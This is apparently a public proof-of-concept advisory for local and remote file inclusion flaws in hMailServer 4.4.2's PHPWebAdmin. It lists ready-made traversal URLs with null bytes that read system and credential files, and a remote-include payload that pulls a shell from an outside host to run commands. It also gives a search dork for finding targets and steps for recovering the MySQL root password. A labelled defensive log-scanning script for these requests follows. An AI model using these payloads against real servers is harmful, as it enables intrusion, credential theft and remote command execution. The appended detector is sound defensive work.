hMailServer 4.4.2 (PHPWebAdmin) local & remote file inclusion

hMailServer 4.4.2 (PHPWebAdmin) local & remote file inclusion poc

by Nine:Situations:Group::strawdog

------------------------------------------------------------------------

our site: http://retrogod.altervista.org

software site: http://www.hmailserver.com/

description: http://en.wikipedia.org/wiki/HMailServer

------------------------------------------------------------------------

google dork: "PHPWebAdmin for hMailServer" intitle:PHPWebAdmin -site:hmailserver.com -dork

poc:

regardless of register_globals & magic_quotes_gpc:

http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../../boot.ini%00

http://hostname/path_to_webadmin/index.php?page=background/../../Bin/hMailServer.INI%00

http://hostname/path_to_webadmin/index.php?page=background/../../MySQL/my.ini%00

http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../../../Program+Files/hmailserver/Bin/hmailserver.ini%00

with register_globals = on:

(prepare a functions.php folder on somehost.com with an index.html with your shell inside on a php enabled server, otherwise a functions.php shell on a php disabled one)

http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/&cmd=dir

with register_globals = on & magic_quotes_gpc = off :

http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\boot.ini%00

http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/shell.txt%00&cmd=dir

http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\Program+Files\hMailServer\Bin\hMailServer.INI%00

http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=../Bin/hMailServer.INI%00

"Bin" folder can be found in a different location, disclose the path by simply calling:

http://hostname/path_to_webadmin/initialize.php

interesting file:

hMailServer.INI - contains two interesting fields:

- the "Administrator password", hashed with md5,

- by having knowledge of that you can calculate the MySQL root password, specified in the "password" field.

You can do this by using the /Addons/Utilities/DecryptBlowfish.vbs script
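
Added example, not part of the original advisory: a check a defender can run over web access logs to find the request shapes listed above (traversal or a null byte in `page`, a client-supplied `hmail_config[...]` array, direct requests to `initialize.php`). The log lines, the `/webadmin/` path, the `page=accounts` value and the finding labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2009:10:00:00 +0000] "GET /webadmin/index.php?page=background/../../Bin/hMailServer.INI%00 HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jan/2009:10:00:04 +0000] "GET /webadmin/initialize.php HTTP/1.1" 200 310',
    '198.51.100.7 - - [01/Jan/2009:10:00:09 +0000] "GET /webadmin/initialize.php?hmail_config%5Bincludepath%5D=http://www.somehost.com/&cmd=dir HTTP/1.1" 200 90',
    '192.0.2.10 - - [01/Jan/2009:10:01:00 +0000] "GET /webadmin/index.php?page=accounts HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

def classify(target):
    """Return sorted finding labels for one request target (path?query)."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    findings = set()
    if script == "initialize.php":
        # An include file requested directly; the advisory uses this for path disclosure.
        findings.add("direct-request-to-include-file")
    # parse_qsl percent-decodes names and values, so %5B, %2F and %00 are normalised.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower().startswith("hmail_config["):
            # Configuration array supplied by the client (register_globals case).
            findings.add("config-array-override")
            if "://" in value:
                findings.add("remote-include-target")
        if script == "index.php" and name == "page" and (".." in value or "\\" in value):
            findings.add("path-traversal")
        if "\x00" in value:
            findings.add("null-byte")
    return sorted(findings)

def scan(lines):
    """Return (client_address, findings) for every log line with at least one finding."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            findings = classify(match.group(1))
            if findings:
                hits.append((line.split()[0], findings))
    return hits

if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, ", ".join(findings))
```

Access logs show only the query string; register_globals also imports POST and cookie variables, so the same `hmail_config` parameter sent that way is only visible with request-body or WAF logging.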
